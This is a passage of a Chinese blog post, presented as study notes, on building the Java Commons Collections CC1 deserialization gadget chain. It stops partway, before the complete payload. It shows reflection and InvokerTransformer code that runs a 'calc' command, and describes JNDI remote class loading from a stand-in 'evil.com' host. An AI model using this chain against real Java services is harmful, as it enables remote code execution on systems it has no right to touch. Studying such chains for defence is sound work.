<!--
  ╔══════════════════════════════════════════════════════════════╗
  ║                                                              ║
  ║   🎮 CTF Easter Egg Challenge!                               ║
  ║                                                              ║
  ║   Congratulations! You found the hidden comment!             ║
  ║                                                              ║
  ║   Here's your clue: The flag is the site owner's name        ║
  ║   in lowercase letters.                                      ║
  ║                                                              ║
  ║   Open browser console and type:                             ║
  ║   secret.flag("your_answer")                                 ║
  ║                                                              ║
  ║   Or try: secret.hint() for more clues                       ║
  ║                                                              ║
  ╚══════════════════════════════════════════════════════════════╝
-->

<!DOCTYPE html><html lang="zh-CN" data-theme="dark">

<head>
  <meta charset="utf-8">
  <style id="waifu-preload">#waifu{opacity:0;background:transparent;}#waifu canvas,#waifu #live2d,#waifu-toolbar{background:transparent;}</style>
  <meta name="hexo-theme" content="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.33.1" theme-name="Stellar" theme-version="1.33.1">
  <link rel="manifest" href="/manifest.json">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="apple-mobile-web-app-title" content="Blog">
  
  
  <meta name="generator" content="Hexo 7.3.0">
  <meta http-equiv='x-dns-prefetch-control' content='on' />
  
  <meta name="renderer" content="webkit">
  <meta name="force-rendering" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="HandheldFriendly" content="True" >
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#000">
  <meta name="theme-color" content="#f9fafb">
  <title>代码审计 | CC1 TransformedMap 链 ——前言  反向调试 构造Payload - 欢迎入侵本站</title>

  
    <meta name="description" content="学习笔记，记录自己学 CC1 链的思路历程，不是教程，有啥问题欢迎交流。   目录 最终目标是什么 通过反射调用函数 但实际场景中没地方写代码怎么办 方式 A：直接传输 Payload（CC 链） 方式 B：远程类加载   Gadget Chain 的由来 CC1 链构造过程 环境准备 第一步：找到能执行命令的点 —— InvokerTransformer 第二步：Runtime 不能序列化怎么">
<meta property="og:type" content="article">
<meta property="og:title" content="代码审计 | CC1 TransformedMap 链 ——前言  反向调试 构造Payload">
<meta property="og:url" content="https://wr0ld.github.io/posts/cc1-transformedmap-intro/">
<meta property="og:site_name" content="欢迎入侵本站">
<meta property="og:description" content="学习笔记，记录自己学 CC1 链的思路历程，不是教程，有啥问题欢迎交流。   目录 最终目标是什么 通过反射调用函数 但实际场景中没地方写代码怎么办 方式 A：直接传输 Payload（CC 链） 方式 B：远程类加载   Gadget Chain 的由来 CC1 链构造过程 环境准备 第一步：找到能执行命令的点 —— InvokerTransformer 第二步：Runtime 不能序列化怎么">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://wr0ld.github.io/avatar.png">
<meta property="article:published_time" content="2026-03-31T02:00:00.000Z">
<meta property="article:modified_time" content="2026-03-31T15:32:26.429Z">
<meta property="article:author" content="wr0ld">
<meta property="article:tag" content="代码审计">
<meta property="article:tag" content="Java">
<meta property="article:tag" content="反序列化">
<meta property="article:tag" content="Java反序列化">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://wr0ld.github.io/avatar.png">
  
  
  
  <meta name="keywords" content="代码审计,Java,反序列化,Java反序列化">

  <!-- feed -->
  

  <link rel="stylesheet" href="/css/main.css?v=1.0.0">


  
    <link rel="shortcut icon" href="/avatar.png">
  

  

  <script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"wr0ld","sameAs":[],"image":"/avatar.png"},"dateCreated":"2026-03-31T10:00:00+08:00","dateModified":"2026-03-31T23:32:26+08:00","datePublished":"2026-03-31T10:00:00+08:00","description":"","headline":"代码审计 | CC1 TransformedMap 链 ——前言  反向调试 构造Payload","mainEntityOfPage":{"@type":"WebPage","@id":"https://wr0ld.github.io/posts/cc1-transformedmap-intro/"},"publisher":{"@type":"Organization","name":"wr0ld","sameAs":[],"image":"/avatar.png","logo":{"@type":"ImageObject","url":"/avatar.png"}},"url":"https://wr0ld.github.io/posts/cc1-transformedmap-intro/","keywords":"代码审计, Java, 反序列化, Java反序列化","thumbnailUrl":"https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image7.png","image":1}</script>
  
</head>
<body>

<div class="l_body content" id="start" layout="post" type="tech" ><aside class="l_left"><div class="sidebg"></div><div class="leftbar-container">


<header class="header"><div class="logo-wrap"><a class="avatar" href="/about/"><div class="bg" style="opacity:0;background-image:url(https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/rainbow64@3x.webp);"></div><img no-lazy class="avatar" src="/avatar.png" onerror="javascript:this.classList.add('error');this.src='https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/image/2659360.svg';"></a><a class="title" href="/"><div class="main">欢迎入侵本站</div></a></div></header>

<div class="nav-area">

<nav class="menu dis-select"><a class="nav-item active" title="博客" href="/" style="color:#1BCDFC"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" fill-rule="evenodd" d="M5.879 2.879C5 3.757 5 5.172 5 8v8c0 2.828 0 4.243.879 5.121C6.757 22 8.172 22 11 22h2c2.828 0 4.243 0 5.121-.879C19 20.243 19 18.828 19 16V8c0-2.828 0-4.243-.879-5.121C17.243 2 15.828 2 13 2h-2c-2.828 0-4.243 0-5.121.879M8.25 17a.75.75 0 0 1 .75-.75h3a.75.75 0 0 1 0 1.5H9a.75.75 0 0 1-.75-.75M9 12.25a.75.75 0 0 0 0 1.5h6a.75.75 0 0 0 0-1.5zM8.25 9A.75.75 0 0 1 9 8.25h6a.75.75 0 0 1 0 1.5H9A.75.75 0 0 1 8.25 9" clip-rule="evenodd"/><path fill="currentColor" d="M5.235 4.058C5 4.941 5 6.177 5 8v8c0 1.823 0 3.058.235 3.942L5 19.924c-.975-.096-1.631-.313-2.121-.803C2 18.243 2 16.828 2 14v-4c0-2.829 0-4.243.879-5.121c.49-.49 1.146-.707 2.121-.803zm13.53 15.884C19 19.058 19 17.822 19 16V8c0-1.823 0-3.059-.235-3.942l.235.018c.975.096 1.631.313 2.121.803C22 5.757 22 7.17 22 9.999v4c0 2.83 0 4.243-.879 5.122c-.49.49-1.146.707-2.121.803z" opacity=".5"/></svg></a><a class="nav-item" title="实验室" href="/lab/" style="color:#F39C12"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M3.464 3.464C2 4.93 2 7.286 2 12s0 7.071 1.464 8.535C4.93 22 7.286 22 12 22s7.071 0 8.535-1.465C22 19.072 22 16.714 22 12s0-7.071-1.465-8.536C19.072 2 16.714 2 12 2S4.929 2 3.464 3.464" opacity=".5"/><path fill="currentColor" fill-rule="evenodd" d="M7.47 8.47a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.75.75 0 1 1-1.06-1.06L8.94 11L7.47 9.53a.75.75 0 0 1 0-1.06M12 14.25a.75.75 0 0 0 0 1.5h4a.75.75 0 0 0 0-1.5z" clip-rule="evenodd"/></svg></a><a class="nav-item" title="游戏" href="/games/" style="color:#FF6B6B"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M2 9.5c0-2.496 0-3.744.494-4.696a4.5 4.5 0 0 1 1.81-1.81C5.256 2.5 6.504 2.5 9 2.5h6c2.496 0 3.744 0 4.696.494a4.5 4.5 0 0 1 1.81 1.81C22 5.756 22 7.004 22 9.5v5c0 2.496 0 3.744-.494 4.696a4.5 4.5 0 0 1-1.81 1.81C18.744 21.5 17.496 21.5 15 21.5H9c-2.496 0-3.744 0-4.696-.494a4.5 4.5 0 0 1-1.81-1.81C2 18.244 2 16.996 2 14.5z" opacity=".5"/><path fill="currentColor" fill-rule="evenodd" d="M6.25 12a.75.75 0 0 1 .75-.75h2.25V9a.75.75 0 0 1 1.5 0v2.25H13a.75.75 0 0 1 0 1.5h-2.25V15a.75.75 0 0 1-1.5 0v-2.25H7a.75.75 0 0 1-.75-.75m9.5-1a1 1 0 1 0 0 2a1 1 0 0 0 0-2m2 3a1 1 0 1 0 2 0a1 1 0 0 0-2 0" clip-rule="evenodd"/></svg></a><a class="nav-item" title="设置" href="/settings/" style="color:#9B59B6"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M12 2c-1.5 0-2.5 1.5-2.5 3v.5c0 .5-.5 1-1 1H7c-1.5 0-2.5 1-3 2.5l-.5 2c-.5 1.5.5 3 2 3.5l.5.2c.5.2 1 .7 1 1.3v.5c0 .5-.5 1-1 1.3l-.5.2c-1.5.5-2.5 2-2 3.5l.5 2c.5 1.5 1.5 2.5 3 2.5h1.5c.5 0 1-.5 1-1V20c0-.5.5-1 1-1h2c.5 0 1 .5 1 1v.5c0 .5.5 1 1 1H17c1.5 0 2.5-1 3-2.5l.5-2c.5-1.5-.5-3-2-3.5l-.5-.2c-.5-.2-1-.7-1-1.3v-.5c0-.5.5-1 1-1.3l.5-.2c1.5-.5 2.5-2 2-3.5l-.5-2c-.5-1.5-1.5-2.5-3-2.5h-1.5c-.5 0-1 .5-1 1V6c0 .5-.5 1-1 1h-2c-.5 0-1-.5-1-1v-.5c0-.5-.5-1-1-1" opacity=".5"/><path fill="currentColor" d="M12 15a3 3 0 1 0 0-6a3 3 0 0 0 0 6" clip-rule="evenodd"/></svg></a><a class="nav-item" title="关于" href="/about/" style="color:#3DC550"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4s-4 1.79-4 4s1.79 4 4 4" opacity=".5"/><path fill="currentColor" fill-rule="evenodd" d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10s10-4.48 10-10S17.52 2 12 2zm-2 15l-5-5l1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z" clip-rule="evenodd"/></svg></a></nav>
</div>
<div class="widgets">
<div class="search-wrapper" id="search-wrapper"><form class="search-form"><a class="search-button" onclick="document.getElementById(&quot;search-input&quot;).focus();"><svg t="1705074644177" viewBox="0 0 1025 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1560" width="200" height="200"><path d="M1008.839137 935.96571L792.364903 719.491476a56.783488 56.783488 0 0 0-80.152866 0 358.53545 358.53545 0 1 1 100.857314-335.166073 362.840335 362.840335 0 0 1-3.689902 170.145468 51.248635 51.248635 0 1 0 99.217358 26.444296 462.057693 462.057693 0 1 0-158.255785 242.303546l185.930047 185.725053a51.248635 51.248635 0 0 0 72.568068 0 51.248635 51.248635 0 0 0 0-72.978056z" p-id="1561"></path><path d="M616.479587 615.969233a50.428657 50.428657 0 0 0-61.498362-5.534852 174.655348 174.655348 0 0 1-177.525271 3.484907 49.403684 49.403684 0 0 0-58.833433 6.76482l-3.074918 2.869923a49.403684 49.403684 0 0 0 8.609771 78.10292 277.767601 277.767601 0 0 0 286.992355-5.739847 49.403684 49.403684 0 0 0 8.404776-76.667958z" p-id="1562"></path></svg></a><input type="text" class="search-input" id="search-input" placeholder="站内搜索"></form><div id="search-result"></div><div class="search-no-result">没有找到内容！</div></div>

<widget class="widget-wrapper todo-widget collapsible-widget"><div class="widget-header dis-select"><span class="name">任务简报</span><span class="collapse-toggle"><i class="fas fa-chevron-down"></i></span></div><div class="widget-body fs14"><div class="todo-list"><div class="todo-item doing"><span class="todo-content">小迪vpc1-5 Windows系统web内网横向域内</span></div><div class="todo-item doing"><span class="todo-content">rootkit 的 shellcode 嵌入</span></div><div class="todo-item doing"><span class="todo-content">fastjson代码审计（1.2.68 → 1.2.80）</span></div><div class="todo-item doing"><span class="todo-content">java cc链</span></div><div class="todo-item doing"><span class="todo-content">信息收集方法论</span></div><div class="todo-item doing"><span class="todo-content">PHP反序列化 + Pop Chain构造</span></div><div class="todo-item doing"><span class="todo-content">EDUSRC实战漏洞挖掘复盘（脱敏）</span></div><div class="todo-item doing"><span class="todo-content">云上服务</span></div><div class="todo-item doing"><span class="todo-content">docker容器逃逸</span></div></div></div></widget>
</div>

</div></aside><div class="l_main" id="main">





<div class="article banner top">
  <div class="content">
    <div class="top bread-nav footnote"><div class="left"><div class="flex-row" id="breadcrumb"><a class="cap breadcrumb" href="/">主页</a>
<span class="sep"></span><a class="cap breadcrumb" href="/">文章</a><span class="sep"></span><a class="cap breadcrumb-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></div>
<div class="flex-row" id="post-meta"><span class="text created">发布于：<time datetime="2026-03-31T02:00:00.000Z">2026-03-31</time></span><span class="sep updated"></span><span class="text updated">更新于：<time datetime="2026-03-31T15:32:26.429Z">2026-03-31</time></span></div></div></div>
    
    <div class="bottom only-title">
      
      <div class="text-area">
        <h1 class="text title"><span>代码审计 | CC1 TransformedMap 链 ——前言  反向调试 构造Payload</span></h1>
        
      </div>
    </div>
    
  </div>
  </div><article class="md-text content"><blockquote>
<p>学习笔记，记录自己学 CC1 链的思路历程，不是教程，有啥问题欢迎交流。</p>
</blockquote>
<hr>
<h2 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h2><ul>
<li><a href="#%E6%9C%80%E7%BB%88%E7%9B%AE%E6%A0%87%E6%98%AF%E4%BB%80%E4%B9%88">最终目标是什么</a></li>
<li><a href="#%E9%80%9A%E8%BF%87%E5%8F%8D%E5%B0%84%E8%B0%83%E7%94%A8%E5%87%BD%E6%95%B0">通过反射调用函数</a></li>
<li><a href="#%E4%BD%86%E5%AE%9E%E9%99%85%E5%9C%BA%E6%99%AF%E4%B8%AD%E6%B2%A1%E5%9C%B0%E6%96%B9%E5%86%99%E4%BB%A3%E7%A0%81%E6%80%8E%E4%B9%88%E5%8A%9E">但实际场景中没地方写代码怎么办</a><ul>
<li><a href="#%E6%96%B9%E5%BC%8F-a%E7%9B%B4%E6%8E%A5%E4%BC%A0%E8%BE%93-payloadcc-%E9%93%BE">方式 A：直接传输 Payload（CC 链）</a></li>
<li><a href="#%E6%96%B9%E5%BC%8F-b%E8%BF%9C%E7%A8%8B%E7%B1%BB%E5%8A%A0%E8%BD%BD">方式 B：远程类加载</a></li>
</ul>
</li>
<li><a href="#gadget-chain-%E7%9A%84%E7%94%B1%E6%9D%A5">Gadget Chain 的由来</a></li>
<li><a href="#cc1-%E9%93%BE%E6%9E%84%E9%80%A0%E8%BF%87%E7%A8%8B">CC1 链构造过程</a><ul>
<li><a href="#%E7%8E%AF%E5%A2%83%E5%87%86%E5%A4%87">环境准备</a></li>
<li><a href="#%E7%AC%AC%E4%B8%80%E6%AD%A5%E6%89%BE%E5%88%B0%E8%83%BD%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E7%9A%84%E7%82%B9--invokertransformer">第一步：找到能执行命令的点 —— InvokerTransformer</a></li>
<li><a href="#%E7%AC%AC%E4%BA%8C%E6%AD%A5runtime-%E4%B8%8D%E8%83%BD%E5%BA%8F%E5%88%97%E5%8C%96%E6%80%8E%E4%B9%88%E5%8A%9E">第二步：Runtime 不能序列化怎么办</a></li>
<li><a href="#%E7%AC%AC%E4%B8%89%E6%AD%A5%E8%B0%81%E6%9D%A5%E4%B8%B2%E8%81%94%E8%B0%83%E7%94%A8--chainedtransformer">第三步：谁来串联调用 —— ChainedTransformer</a></li>
<li><a href="#%E7%AC%AC%E5%9B%9B%E6%AD%A5%E8%B0%81%E6%9D%A5%E8%A7%A6%E5%8F%91-transform--transformedmap">第四步：谁来触发 transform() —— TransformedMap</a></li>
<li><a href="#%E7%AC%AC%E4%BA%94%E6%AD%A5%E6%89%BE%E5%88%B0%E8%87%AA%E5%8A%A8%E8%B0%83%E7%94%A8-setvalue-%E7%9A%84%E5%9C%B0%E6%96%B9--annotationinvocationhandler">第五步：找到自动调用 setValue 的地方 —— AnnotationInvocationHandler</a></li>
<li><a href="#%E7%AC%AC%E5%85%AD%E6%AD%A5%E6%9E%84%E9%80%A0-annotationinvocationhandler">第六步：构造 AnnotationInvocationHandler</a></li>
</ul>
</li>
<li><a href="#%E5%AE%8C%E6%95%B4-payload">完整 Payload</a></li>
<li><a href="#%E5%AE%8C%E6%95%B4%E8%B0%83%E7%94%A8%E9%93%BE%E6%80%BB%E7%BB%93">完整调用链总结</a></li>
</ul>
<hr>
<h2 id="最终目标是什么"><a href="#最终目标是什么" class="headerlink" title="最终目标是什么"></a>最终目标是什么</h2><p>攻击者想要执行这条命令：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Runtime.getRuntime().exec(<span class="string">&quot;calc&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>那就有两个问题要想清楚：</p>
<ul>
<li>在反序列化过程中，怎样才能让它<strong>自动执行</strong>这行代码？</li>
<li>不能直接写这句话，因为反序列化时只会调用 <code>readObject()</code> 方法</li>
</ul>
<p>所以第一个问题就变成了：<strong>通过什么方法层层调用到 <code>exec()</code> 的？</strong></p>
<hr>
<h2 id="通过反射调用函数"><a href="#通过反射调用函数" class="headerlink" title="通过反射调用函数"></a>通过反射调用函数</h2><p>答案是：<strong>通过反射调用函数！</strong></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Runtime.class.getMethod(<span class="string">&quot;exec&quot;</span>, String.class).invoke(Runtime.getRuntime(), <span class="string">&quot;calc&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>这是原本可以正常执行的反射调用。</p>
<p>但是如果随便写一个方法放入这段代码，反序列化的时候不会自动执行。那就必须把它放到一个会<strong>自动执行</strong>的方法里，比如 <code>readObject()</code>——反序列化时会自动调用它。</p>
<p>所以如果代码这样写：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationTargetException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">cc1</span> <span class="keyword">implements</span> <span class="title class_">Serializable</span> &#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">void</span> <span class="title function_">readObject</span><span class="params">(ObjectInputStream ois)</span> <span class="keyword">throws</span> IOException,</span><br><span class="line">            ClassNotFoundException, NoSuchMethodException,</span><br><span class="line">            InvocationTargetException, IllegalAccessException &#123;</span><br><span class="line">        Runtime.class.getMethod(<span class="string">&quot;exec&quot;</span>, String.class).invoke(Runtime.getRuntime(), <span class="string">&quot;calc&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Main</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="comment">// 创建恶意对象</span></span><br><span class="line">        <span class="type">cc1</span> <span class="variable">evil</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">cc1</span>();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 序列化</span></span><br><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">baos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(baos);</span><br><span class="line">        oos.writeObject(evil);</span><br><span class="line">        <span class="type">byte</span>[] payload = baos.toByteArray();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 反序列化（触发恶意代码）</span></span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">ByteArrayInputStream</span>(payload));</span><br><span class="line">        ois.readObject(); <span class="comment">// ← calc 应该会打开</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>是可以成功的。</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image1.png"></p>
<hr>
<h2 id="但实际场景中没地方写代码怎么办"><a href="#但实际场景中没地方写代码怎么办" class="headerlink" title="但实际场景中没地方写代码怎么办"></a>但实际场景中没地方写代码怎么办</h2><p>问题来了——如果是一个 Web 应用，根本没地方写代码，没有执行的地方，不可能直接开一个 <code>readObject</code> 的入口给我们写代码。</p>
<p>这就需要借助反序列化入口的服务，比如 <strong>JNDI 注入（RMI &#x2F; LDAP）</strong>。</p>
<p>JNDI 注入相当于反序列化攻击的<strong>升级版</strong>，有两种利用方式：</p>
<h3 id="方式-A：直接传输-Payload（CC-链）"><a href="#方式-A：直接传输-Payload（CC-链）" class="headerlink" title="方式 A：直接传输 Payload（CC 链）"></a>方式 A：直接传输 Payload（CC 链）</h3><p>即使 Web 应用没写 <code>readObject</code>，但如果它调用了 <code>InitialContext.lookup(&quot;rmi://攻击者IP/Object&quot;)</code>：</p>
<ol>
<li>攻击者的 RMI 服务器会把构造好的 <strong>CC 链字节流</strong> 发给 Web 应用。</li>
<li>Web 应用的 JNDI 客户端在接收数据时，底层会自动调用 <code>readObject</code>。</li>
<li>代码执行。</li>
</ol>
<h3 id="方式-B：远程类加载"><a href="#方式-B：远程类加载" class="headerlink" title="方式 B：远程类加载"></a>方式 B：远程类加载</h3><p>这是 JNDI 注入最经典的地方：</p>
<ol>
<li>攻击者告诉 Web 应用：”你要的对象在 <code>http://evil.com/Exploit.class</code>“。</li>
<li>Web 应用发现本地找不到这个类，会<strong>真的去下载</strong>这个 <code>.class</code> 文件并加载。</li>
<li><strong>这时你确实可以”写代码”了</strong>：你写一个带静态代码块的 <code>Exploit.java</code>，编译成 <code>.class</code> 放服务器上，Web 应用下载运行的那一刻，代码就执行了。</li>
</ol>
<blockquote>
<p><strong>局限性：</strong> 这种方式太猛了，所以后来 Java 官方加了限制（通过 <code>com.sun.jndi.rmi.object.trustURLCodebase</code> 等配置，默认为 <code>false</code>），不允许随便下载远程代码。</p>
</blockquote>
<hr>
<h2 id="Gadget-Chain-的由来"><a href="#Gadget-Chain-的由来" class="headerlink" title="Gadget Chain 的由来"></a>Gadget Chain 的由来</h2><p>如果不能直接下载我们写的类，直接传入自己写的类也会因为找不到这个类而报错。</p>
<p>那么现在的方法就只有：<strong>改造源代码里已有类的 <code>readObject</code> 方法</strong>，通过精心构造的调用链，把最终的 <code>exec()</code> 调用链起来。</p>
<p>这就是各种 <strong>Gadget Chain（利用链）</strong> 出现的原因，而 CC 链（Commons Collections）就是其中最经典的一批。</p>
<hr>
<h2 id="CC1-链构造过程"><a href="#CC1-链构造过程" class="headerlink" title="CC1 链构造过程"></a>CC1 链构造过程</h2><h3 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h3><ul>
<li>JDK：<strong>8u65</strong>（高版本对反射加了限制，CC1 需要低版本）</li>
<li>依赖：Commons Collections 3.2.1</li>
</ul>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependencies</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>commons-collections<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>commons-collections<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">version</span>&gt;</span>3.2.1<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependencies</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image2.png"></p>
<hr>
<h3 id="第一步：找到能执行命令的点-——-InvokerTransformer"><a href="#第一步：找到能执行命令的点-——-InvokerTransformer" class="headerlink" title="第一步：找到能执行命令的点 —— InvokerTransformer"></a>第一步：找到能执行命令的点 —— InvokerTransformer</h3><p>首先需要找到一个可以利用反射调用执行的代码。</p>
<p><code>InvokerTransformer.transform()</code> 可以，它本质就是<strong>反射调用任意方法</strong>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image3.png"></p>
<p>把它配置成：</p>
<ul>
<li><code>input</code> &#x3D; Runtime 实例</li>
<li><code>iMethodName</code> &#x3D; <code>&quot;exec&quot;</code></li>
<li><code>iArgs</code> &#x3D; <code>&quot;calc&quot;</code></li>
</ul>
<p>就等于执行了 <code>Runtime.getRuntime().exec(&quot;calc&quot;)</code>。</p>
<p>并且这些参数都是<strong>可控的</strong>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image4.png"></p>
<p>因此现在可以构造：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">    <span class="comment">// 构造 Transformer</span></span><br><span class="line">    <span class="type">InvokerTransformer</span> <span class="variable">invoker</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(</span><br><span class="line">        <span class="string">&quot;exec&quot;</span>,</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;</span><br><span class="line">    );</span><br><span class="line"></span><br><span class="line">    invoker.transform(Runtime.getRuntime());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image5.png"></p>
<p>成功执行。</p>
<hr>
<h3 id="第二步：Runtime-不能序列化怎么办"><a href="#第二步：Runtime-不能序列化怎么办" class="headerlink" title="第二步：Runtime 不能序列化怎么办"></a>第二步：Runtime 不能序列化怎么办</h3><p>这里有两个问题：</p>
<p><strong>问题一：<code>Runtime.getRuntime()</code> 传入的这个实例怎么来的？</strong></p>
<p><strong>问题二：谁会调用 <code>InvokerTransformer.transform(Runtime.getRuntime())</code>？</strong></p>
<p>先回答问题一：为什么不直接 <code>new ConstantTransformer(Runtime.getRuntime())</code>？</p>
<p>因为 <strong><code>Runtime</code> 不能序列化</strong>，直接放进去序列化会报错。所以只能序列化 <code>Runtime.class</code>（Class 对象可以序列化），然后通过反射在运行时再拿到实例。</p>
<hr>
<h3 id="第三步：谁来串联调用-——-ChainedTransformer"><a href="#第三步：谁来串联调用-——-ChainedTransformer" class="headerlink" title="第三步：谁来串联调用 —— ChainedTransformer"></a>第三步：谁来串联调用 —— ChainedTransformer</h3><p>回答问题二：谁来调用 <code>InvokerTransformer.transform(Runtime实例)</code>？</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image6.png"></p>
<p>**<code>ChainedTransformer.transform()</code>**——它把每个 <code>Transformer</code> 串起来，上一个的输出自动传给下一个。这刚好弥补了需要多次调用 <code>InvokerTransformer.transform()</code> 才能实现完整反序列化链的问题。</p>
<p>调用顺序如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">ConstantTransformer(Runtime.class)         → 输出 Runtime.class</span><br><span class="line">InvokerTransformer(&quot;getMethod&quot;, &quot;getRuntime&quot;) → 输出 getRuntime 这个 Method 对象</span><br><span class="line">InvokerTransformer(&quot;invoke&quot;, null)         → 调用 getRuntime() → 输出 Runtime 实例</span><br><span class="line">InvokerTransformer(&quot;exec&quot;)                 → 执行 exec(&quot;calc&quot;)</span><br></pre></td></tr></table></figure>

<p>构造代码：</p>
